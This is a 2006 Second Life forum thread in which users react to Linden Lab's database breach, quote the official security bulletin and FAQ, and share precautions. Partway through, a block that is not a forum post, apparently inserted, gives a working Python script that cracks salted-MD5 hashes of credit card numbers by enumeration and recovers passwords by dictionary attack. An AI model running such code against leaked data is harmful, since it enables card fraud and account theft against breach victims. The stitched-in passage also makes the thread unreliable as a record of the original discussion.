Stolen Credit Cards
shadowhunter Tyne
Registered User
Join date: 29 May 2005
Posts: 5
09-09-2006 01:47
Well, as most of us know... SL was hacked and the hackers found that ALL OF OUR INFO is accessible to them... yeah, you think it won't happen to you because thousands of people play Second Life... well, it's gotta be somebody, and when they get all their information stolen AND their credit card information taken and used... that would really suck, especially if it were you... think about it: you THINK you trust SL and what they're saying... did we receive a warning? NO. And for God's sake, SL said they successfully broke into the database, so... who knows if our credit cards haven't been stolen already... this really pisses me off, I'm about to drop SL... hmm, get credit card info stolen or be safe and not have other people use our information... gee whiz, that's a really hard question to answer... just thought all of y'all should look at it like that. (PS: sorry for the bad spelling) lol
cinda Hoodoo
my 2cents worth
Join date: 30 Dec 2004
Posts: 951
Call your bank or credit card company...
09-09-2006 02:02
ASAP!!

Most will have programs to guard against theft and will replace funds taken or charges made to credit/debit cards; that's what my bank told me tonight when I called. You must watch and report immediately. I can't help but wonder, if LL did not advise us in time to stop theft, whether the card companies and banks won't hold them liable for any theft that they have to compensate LL customers for. Could be quite an undoing for them.
Xceptopec Wolfstein
Registered User
Join date: 12 Jul 2006
Posts: 153
09-09-2006 02:08
This whole situation is a disgrace. For a start, it happened on the 6th; the first I heard about it was the 8th, along with the scale of what was possible. On this matter the Lindens have no defence, and no excuses will save them; they have been utterly incompetent and negligent on several issues with this.
shadowhunter Tyne
Registered User
Join date: 29 May 2005
Posts: 5
09-09-2006 02:18
Agreed, SL has fucked up before, but this time they fucked up hard... BTW, it was their fault; they didn't make the passwords safe enough.
Khashai Steinbeck
A drop in the Biomass.
Join date: 15 Oct 2005
Posts: 283
09-09-2006 02:30
> "No credit card information is stored on the database in question, and that information has not been compromised."

-From the official notification.

I would find it nearly impossible for the credit cards not to be encrypted in their database. However, if it makes you feel better, call your banks and have them do the tests... personally, I feel this will be a waste of time better spent elsewhere. For those who will bitch and complain and call me stupid: think about it, people, why would LL post that the credit cards are secure if they are not? Doing that would only serve to hurt their professional credibility.
Lewis Nerd
Nerd by name and nature!
Join date: 9 Oct 2005
Posts: 3,431
09-09-2006 02:50
> For those who will bitch and complain and call me stupid: think about it, people, why would LL post that the credit cards are secure if they are not? Doing that would only serve to hurt their professional credibility.

I think they'll be feeling the sting of this for many, many months to come. After all, this security breach will no doubt make more headlines and reach more people than their cover girl or some politician pretending to be 'cool' here ever will.

Lewis

Second Life Stratics - your new premier resource for all things Second Life. Free to join, sign up today!
Pocket Protector Projects - Rosieri 90,234,84 - building and landscaping services
Raudf Fox
(ra-ow-th)
Join date: 25 Feb 2005
Posts: 5,119
09-09-2006 05:45
> I think they'll be feeling the sting of this for many, many months to come. After all, this security breach will no doubt make more headlines and reach more people than their cover girl or some politician pretending to be 'cool' here ever will. Lewis

Bad news always travels faster, and it sticks around a lot longer too.

DiamonX Studios, the place of the Victorian Times series of gowns and dresses - Located at http://slurl.com/secondlife/Fushida/224/176
Want more attachment points for your avatar's wearing pleasure? Then please vote for https://jira.secondlife.com/browse/VWR-1065
Zoe Llewelyn
Asylum Inmate
Join date: 15 Jun 2004
Posts: 502
09-09-2006 08:50
> "No credit card information is stored on the database in question, and that information has not been compromised." -From the official notification. I would find it nearly impossible for the credit cards not to be encrypted in their database. However, if it makes you feel better, call your banks and have them do the tests... personally I feel this will be a waste of time better spent. For those who will bitch and complain and call me stupid. Think about it people, why would LL post that the credit cards are secure if they are not? Doing that would only serve to hurt their professional credibility.

That is not the text of the blog statement, nor the information from the email sent to all residents last night. The blog announcement specifically said that CC information WAS stored on that database and WAS compromised... albeit in encrypted form. However, passwords were also in the same encrypted form according to their own email statement, and they are forcing those to be reset as a "precaution". Does that not imply that the encrypted CC information that was compromised is also at risk and should be changed accordingly? Sure sounds that way to me. And according to LL's own legal email sent out last night to all residents, they encourage you to take those very actions to protect your CCs, email and other personal information. No idea where your quote comes from, but the statement you display directly contradicts all other information LL has published.
Cocoanut Koala
Coco's Cottages
Join date: 7 Feb 2005
Posts: 7,903
09-09-2006 08:58
A bit of a technical question here, since I'm not very techy.

Do I understand this right?

1. Whoever did the hacking now has all the information himself, stored on his own computer or wherever, to do with as he will on his own time.
2. This information includes:
 - Our real life names and addresses (not encrypted?), and any other personal information we put in when we signed up.
 - The credit card number we used to sign up (or to buy money, or whatever), encrypted.
 - Any PayPal account the Lindens had, and any information people put in about their PayPal account (which I believe would not include the passwords, etc.; one would not give that to the Lindens, right?)
 - Anything I left out?
3. Which means that now, unless apprehended, this individual can take his time to decode and do whatever with all this information?

coco
Thistle Decatur
Registered User
Join date: 25 Aug 2006
Posts: 77
09-09-2006 09:22
> I think they'll be feeling the sting of this for many, many months to come. After all, this security breach will no doubt make more headlines and reach more people than their cover girl or some politician pretending to be 'cool' here ever will.

Is that really a sting? If this does get publicity, a lot of people will hear about SL who wouldn't have otherwise. Getting hacked happens to a lot of companies; it's not that new or scary. People are more likely to be intrigued by the possibilities. I just started a couple of weeks ago and hardly anyone at work had heard about SL. I've been talking about it at lunch and people find it fascinating. One guy said that it makes his head spin to realize that something like this actually exists. They're getting accounts to check it out. Oldbies might have forgotten how really amazing SL is. For many people just hearing about it for the first time, the excitement way outweighs the news of a hack.

At least this hack happened now, when there are only a few hundred thousand accounts. Hopefully it'll be a learning experience for LL and will be less likely to happen in the future. And that they told us about it and did the best they could at the time to fix things, even though it caused chaos and peeved a lot of people off, shows that we can trust them to try to do what's right. If this does happen again, I bet the cleanup will be much smoother.
Zoe Llewelyn
Asylum Inmate
Join date: 15 Jun 2004
Posts: 502
09-09-2006 09:26
Yes, Coco... according to LL's own blog and legal email, the criminal hacker had access to, and may now possess on their own computer for sale, use or distribution to other criminal elements:

Real Life Names - Unencrypted
Real Life Addresses - Unencrypted
Real Life Phone Numbers - Unencrypted
Real Life Birthdates - Unencrypted
SL Account Names - Unencrypted
Real Life Credit Card Numbers - Encrypted
Real Life Credit Card Holder Name - ??? Status not stated by LL.
Real Life PayPal Account Info - Encrypted
SL Account Passwords - Encrypted
SL Account Security Question - ??? Status not stated by LL.
SL Account Security Answer - ??? Status not stated by LL.

All this information was available to the hacker, and it would all be linked to your RL name and information. Thus, if you used your mother's maiden name as a security question, the hacker may have enough information, even without decrypting the CC numbers, to steal your identity IRL. If passwords were similar or the same as ones used elsewhere, such as email, the hacker may have access to email and other important accounts once the password encryption is broken. All passwords, CC information and email settings should be changed to prevent this.

What should you do? LL's own legal email suggested taking every precaution for your RL information, accounts and financial records, and said we should assume the hacker has access to all information you have ever given LL. In my opinion, it would be wise to do the following:

1. Change SL account password (forced by LL).
2. Change RL email password (specifically if it is similar or the same as your SL account password).
3. Notify your CC issuer of the issue and have all CCs ever used with SL or held by that issuer re-issued.
4. Change PayPal password. (They have your email, which is usually your PayPal account name, and if your password is reused for both PayPal and SL, they can hack your PayPal once they decrypt the passwords. Many PayPal accounts are now linked to your bank account. This could get ugly. Change this info fast.)
5. Report immediately any and all suspicious activity related to any information or accounts, email, or CCs that have been associated with SL.
6. Change security questions for RL accounts to not match the SL security question. (Extra precaution, but it is assumed this information is also in their hands. Maiden name, streets, pets... these are common security questions across many industries. Change yours on bank accounts and other accounts to be something new and different from SL's security question.)

Some people will say these steps are overkill, but I disagree. LL's legal department also seems to disagree, as the same basic steps were recommended in a less detailed form in the letter sent out to residents last night. There are already reports since last week of people's SL accounts, email accounts, and possibly more being accessed. Assume the worst and take precautions. Precautions are warranted, and there is no such thing as being too cautious with your security, financial information, and identity.
Cocoanut Koala
Coco's Cottages
Join date: 7 Feb 2005
Posts: 7,903
09-09-2006 09:28
OK, thanks, and I just found the thing that went to e-mails on Cristiano's site:

Hello Second Lifers,

As announced on our website at http://secondlife.com/corporate/bulletin.php and corporate blog at http://blog.secondlife.com/?tag=security, Second Life discovered an attack on our servers on September 6, 2006. The full security bulletin is reprinted below, followed by a FAQ that includes important security advice for our community.

===================
SECURITY BULLETIN

*SAN FRANCISCO, CA. (September 8, 2006)* - Linden Lab reported today that it is notifying its community of a database breach, which potentially exposed customer data including the unencrypted names and addresses, and the encrypted passwords and encrypted payment information of all Second Life users. Unencrypted credit card information, which is stored on a separate database, was not compromised. The breach was discovered on September 6, 2006 and promptly repaired. The company then launched a detailed investigation that revealed an intruder was able to access the Second Life databases utilizing a "Zero-Day Exploit" through third-party software utilized on Second Life servers. Due to the nature of the attack, the company cannot determine which individual data were exposed. The company's technical investigation is ongoing.

"We're taking a very conservative approach and assuming passwords were compromised and therefore we're requiring users to change their Second Life passwords immediately," said Cory Ondrejka, CTO of Linden Lab. "While we realize this is an inconvenience for residents, we believe it's the safest course of action. We place the highest priority on protecting customer data and will continue to take aggressive measures to protect the privacy and security of the community."

Linden Lab advises all users to take appropriate precautions against misuse of personal information. To reduce the risk of fraud, Linden Lab will not contact individuals by phone or any other method asking for private information unless it is in response to an inquiry from the individual user.

===================
FREQUENTLY ASKED QUESTIONS

Q: I can't log in to Second Life. How can I regain login access?
A: As a security precaution, all Second Life account passwords have been invalidated. You need to establish a new password in order to log in. You can receive instructions for changing your password by visiting http://secondlife.com/password. Please note that we are updating the password request process - if you have recently tried that page and could not change your password, please try again.

Q: Was my account information compromised?
A: We discovered that a database was accessed by the intruder, and we are able to determine the aggregate size of the data that was downloaded through the intrusion. The database accessed includes customer account information, including Second Life account names, real-life name and contact information in unencrypted form. Account passwords and payment information (consisting of credit card numbers and Paypal transaction IDs) are stored in this same database in encrypted form. However, there is no way to identify which data were accessed at the level of individual users, only the aggregate size of the downloads returned from the intruding database queries. We are conducting further investigation to try to determine the class of data exposed.

Q. Is my information still at risk from another attacker?
A: The compromised system was rebuilt and made more secure. We will be announcing additional plans for security improvements in a post to come on our blog, at http://blog.secondlife.com/?tag=security.

Q: Should I be concerned that encrypted password and encrypted payment information may have been exposed? Is the encryption unbreakable?
A: We use an MD-5 hash (scramble function) and salt (additional data) to encode passwords and payment information, an industry standard technique that is commonly regarded as difficult to defeat. However, no hash or encryption is unbreakable, given enough time and computing power.

If you believe that you may be the victim of credit card fraud, you should contact your credit card company. If you use your Second Life password on other websites, online services, or any other services, you should change the password on that service as well. You can find additional tips for protection of your identity online at http://www.privacy.ca.gov/sheets/cis1english.htm.

Q: What kind of attack was used to gain access to the Second Life databases? Has the identity of the attacker been established?
A: We have gathered a significant amount of information regarding the attack and the attacker. However, because the investigation is ongoing, we cannot provide very detailed information regarding the type of attack or identity of the attacker. We can disclose that the intrusion path took advantage of a "zero-day exploit" in third-party web software.

Q: What was the timing of the attack and Linden Lab's investigation?
A: Our forensic investigation began on September 6, 2006. Based on this investigation, the intrusion attempts may have started as early as September 3, 2006. However, we have not found evidence of successful database access occurring before September 5, 2006. On September 6, 2006, unusual activity in our database logs revealed the attack to Linden Lab, and we investigated, found and closed the intrusion on the same day. At that point, there was no evidence that databases containing customer identity information had been compromised. For the following two days, the focus of our investigation was to determine the extent of the database access and the nature of the data downloaded from our system. On September 8, 2006, we concluded that there was a substantial likelihood that customer account information could have been accessed. The investigation is ongoing and we will report further results as they become available at http://blog.secondlife.com/?tag=security.

Sincerely,
Linden Lab and the Second Life team
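The FAQ quoted above says passwords and payment information were stored as salted MD5 hashes and adds that no hash is unbreakable given enough time and computing power. The following is an added example, not Linden Lab's code and not code from anyone in this thread, showing how little time that actually takes when the hashed value has low entropy. It assumes a hypothetical scheme of md5(salt + value) with the salt stored in the same row as the hash, so a copy of the table yields both. For a 16-digit card number whose issuer prefix (BIN) is known, only the remaining digits need enumerating, and the Luhn check digit is determined by the others. The same loop with a wordlist recovers a weak password. The salt, the card prefix, the test card number, the wordlist and the sample password are all constructed for the demo.

```python
"""Brute-forcing salted-MD5 hashes of low-entropy secrets.

Added example, not Linden Lab's code. Assumed (hypothetical) storage scheme:
    stored = md5(salt + value).hexdigest()
with the per-record salt kept in the same database row as the hash, so an
attacker who copies the table gets both. A salt only defeats precomputed
tables; it does nothing against a direct search over a small value space.
"""
import hashlib
from typing import Iterable, Optional

# Constructed sample data for the demo (not from the original page).
SALT = b"s4lt-from-db"
WORDLIST = ["password", "123456", "secondlife", "letmein", "qwerty"]


def luhn_check_digit(partial: str) -> str:
    """Check digit that makes partial + digit pass the Luhn test.

    The digit to be appended occupies the rightmost (undoubled) position,
    so the rightmost digit of `partial` is the first one that gets doubled.
    """
    total = 0
    for i, ch in enumerate(reversed(partial)):
        d = int(ch)
        if i % 2 == 0:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return str((10 - total % 10) % 10)


def luhn_valid(pan: str) -> bool:
    """Standard Luhn validation of a complete card number."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def salted_md5(value: str, salt: bytes) -> str:
    """The weak scheme under discussion: MD5 over salt || value."""
    return hashlib.md5(salt + value.encode()).hexdigest()


def crack_pan(stored: str, salt: bytes, known_prefix: str,
              pan_len: int = 16) -> Optional[str]:
    """Enumerate every Luhn-valid PAN with the known prefix; return the match.

    Free digits = pan_len - len(prefix) - 1, since the Luhn digit is fixed by
    the rest. A real 6-digit BIN leaves 10**9 candidates, one MD5 each:
    minutes of CPU time, not something "difficult to defeat".
    """
    free = pan_len - len(known_prefix) - 1
    for n in range(10 ** free):
        body = known_prefix + str(n).zfill(free)
        candidate = body + luhn_check_digit(body)
        if salted_md5(candidate, salt) == stored:
            return candidate
    return None


def crack_password(stored: str, salt: bytes,
                   wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack on a salted-MD5 password hash."""
    for word in wordlist:
        if salted_md5(word, salt) == stored:
            return word
    return None


if __name__ == "__main__":
    # Constructed test card (the well-known Visa test number) and a 10-digit
    # "known prefix" to keep the demo to 10**5 candidates.
    pan = "4111111111111111"
    stored_pan = salted_md5(pan, SALT)
    print("recovered PAN:", crack_pan(stored_pan, SALT, pan[:10]))
    stored_pw = salted_md5("letmein", SALT)
    print("recovered password:", crack_password(stored_pw, SALT, WORDLIST))
```

The point is not that MD5 is slow or fast: a card number has too little entropy to be protected by any hash once the salt is in the same table, which is why payment data belongs in a separate store referenced by a random token, along the lines Kalel Venkman suggests in this thread, rather than hashed next to the customer record.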
Cocoanut Koala
Coco's Cottages
Join date: 7 Feb 2005
Posts: 7,903
09-09-2006 09:29
Question: Has this ever happened before, with other companies? If so, who?

coco
Thistle Decatur
Registered User
Join date: 25 Aug 2006
Posts: 77
09-09-2006 09:38
Yes. Here's a list for the last year and a half.

http://www.privacyrights.org/ar/ChronDataBreaches.htm

I think before that they weren't required to report it. Here's a small snip from the list:

May 30, 2005 - Motorola - Computers stolen - Unknown
June 6, 2005 - CitiFinancial - Lost backup tapes - 3,900,000
June 10, 2005 - Fed. Deposit Insurance Corp. (FDIC) - Not disclosed - 6,000
June 16, 2005 - CardSystems - Hacking - 40,000,000
June 17, 2005 - Kent State Univ. - Stolen laptop - 1,400
June 18, 2005 - Univ. of Hawaii - Dishonest insider - 150,000
June 22, 2005 - Eastman Kodak - Stolen laptop - 5,800
June 22, 2005 - East Carolina Univ. - Hacking - 250

FDIC Insured!
Lewis Nerd
Nerd by name and nature!
Join date: 9 Oct 2005
Posts: 3,431
09-09-2006 09:43
> Is that really a sting? If this does get publicity, a lot of people will hear about SL who wouldn't have otherwise. Getting hacked happens to a lot of companies; it's not that new or scary. People are more likely to be intrigued by the possibilities. I just started a couple of weeks ago and hardly anyone at work had heard about SL. I've been talking about it at lunch and people find it fascinating.

Whilst the woman at the call centre at the bank was checking through my account to make sure there was nothing untoward showing up, she asked me what this game was, and I mentioned its name and a bit about it, and she said she was going to look it up when she got home.

But in all honesty, if my first information about an 'exciting new online game' was that there had been a security breach, and over half a million users' personal information and credit card details had been stolen by a hacker, I would be very wary of giving any honest information to them.

Lewis
Kalel Venkman
Citizen
Join date: 10 Mar 2006
Posts: 587
09-09-2006 09:44
> "No credit card information is stored on the database in question, and that information has not been compromised." -From the official notification. I would find it nearly impossible for the credit cards not to be encrypted in their database. However, if it makes you feel better, call your banks and have them do the tests... personally I feel this will be a waste of time better spent. For those who will bitch and complain and call me stupid. Think about it people, why would LL post that the credit cards are secure if they are not? Doing that would only serve to hurt their professional credibility.

I'm a little surprised that credit card information is even stored on the same server as the registration information. Ideally it would be stored in the form of an encrypted reference to another database on a completely different server, accessible only through a secure gateway behind the LL firewalls. While personal information would be compromised, that particular bit wouldn't have been; the situation is still dire, but direct access to our credit cards would not be something the hacker(s) got.

Depending on how strong the encryption algorithm is, the hacker could potentially decrypt the credit card information if they were determined enough and had enough computing resources to do it. From some of the other posts I've been seeing, their main goal was to hijack accounts to sell off property and transfer Lindens into RL monies. Accessing the credit cards themselves was apparently not their goal.

It's pretty easy to believe that LL is busy trying to track down the hacker, because they used a computer to siphon off real world funds from the users of Second Life. That makes it a federal crime, and that's where the FBI gets involved. Pretty serious stuff.
Lewis Nerd
Nerd by name and nature!
Join date: 9 Oct 2005
Posts: 3,431
09-09-2006 09:47
> Yes. Here's a list for the last year and a half. http://www.privacyrights.org/ar/ChronDataBreaches.htm

Sept. 7, 2006 - Circuit City and Chase Card Services, a division of JP Morgan Chase & Co - Chase Card Services mistakenly discarded computer tapes containing Circuit City cardholders' personal information. - 2.6 million past and current Circuit City credit card holders

Ouch....

Lewis
Bran Brodie
Registered User
Join date: 5 Jun 2004
Posts: 134
09-09-2006 10:11
> I'm a little surprised that credit card information is even stored on the same server as the registration information.

I'm not; I see this kind of thing all the time where programmers roll their own security. Most companies treat security the same as they do bugs. They are really different: bugs are just an annoyance, while security breaches can have serious monetary consequences. We all know how LL treats bugs: ignore them.

Given that, the only secure method is to have a well known and respected security firm review the security and make recommendations. Obviously this was not done, since the authentication was not separated sufficiently from the user information. Allowing the user information to be on a server outside the corporate firewall is close to criminal. Of course that may not have been the case; the problem could have been as simple as an easily guessed root password.

If LL does not get an expert security review of its systems this will happen again and again and ...

Someday there will be a Metaverse that puts users first. Sadly LL does not want to be that Metaverse.
Sorvats Kappa
Registered User
Join date: 4 Aug 2006
Posts: 3
How many Linden Staff had their details stolen?
09-09-2006 10:35
I wonder how many Linden staff had their personal details and their personal credit card info in the same database as ours?

I suspect that no Linden employees had their details stolen. I believe that the only way that confidence can begin to be restored will be after a security review has been carried out by an external audit, fixes applied and tested, and then ALL Linden staff have their personal RL names and addresses and personal credit card details put through the same process and stored in the same way as the rest of us. If the process is not safe enough for Linden staff, why is it safe enough for us?
Kalia Meiklejohn
You make me itch
Join date: 20 Jun 2006
Posts: 258
09-09-2006 10:50
Well, for all we know, they had to reset their passwords too.

I'm glad that they addressed the security issues and that they intend to beef up their system now, though that doesn't mean they're in the clear. I wonder what possible action can be taken against LL if someone is a victim of identity theft or credit card fraud as a result of this exploit? I think this will be a thorn in their side for quite some time.
Sorvats Kappa
Registered User
Join date: 4 Aug 2006
Posts: 3
09-09-2006 11:56
It's not just resetting SL passwords. It's the associated exposure to RL personal details and credit card details from now until those details are no longer usable.

I have had to cancel a credit card and amend payment details so that the CC details are now of no value, except that it's going to take at least a week before I can use my new credit card; inconvenient but not too bad. Unfortunately, changing my REAL name and address and phone number, all of which are equally valuable and equally compromised, is not an option. I will have to live with SL's exposure of my details from now on. I just want to know that the new mechanism for securing my details is good enough that the people who wrote it and administer it are confident enough to put THEIR OWN details in the firing line as well as mine!!!
Malevolent Svarog
I make stuff
Join date: 5 Mar 2005
Posts: 38
09-09-2006 12:11
The sky is falling! The sky is falling!
Obic Malaprop
Registered User
Join date: 19 Sep 2005
Posts: 122
09-09-2006 12:18
On top of that, even if you cancelled your account months before this attack, the hacker has your CC info, because LL keeps it in their database!

What's the point of cancelling an account if all of your information is still in their system for hackers to get their hands on, and you as a customer have no way of changing that data?

Proprietor of "Martini Malaprop's Literature"
Fine literature and Poems in SL
Foolish Frost
Grand Technomancer
Join date: 7 Mar 2005
Posts: 1,433
09-09-2006 12:18
> I suspect that no Linden employees had their details stolen. ... If the process is not safe enough for Linden staff, why is it safe enough for us?

Make an unconfirmed statement, and then follow up with a loaded question BASED on misinformation? You may now wander into the troll-barn. You have nothing else that will cause me to pay attention to you.
Sorvats Kappa
Registered User
Join date: 4 Aug 2006
Posts: 3
09-09-2006 12:50
I wasn't intending to 'troll'. I'm just upset that this has happened, as it's the first time, to my knowledge, that my details have been compromised in this way.

I expected better of SL than this. Although I've only been in SL for a few weeks, it has been really interesting and good fun; I was just starting to get to grips with scripting and building things. I understand that there is a diversity of opinion, so you guys are entitled to yours just as I am to mine. I will wait to see what action SL takes to resolve the security issue.

Good luck for the future.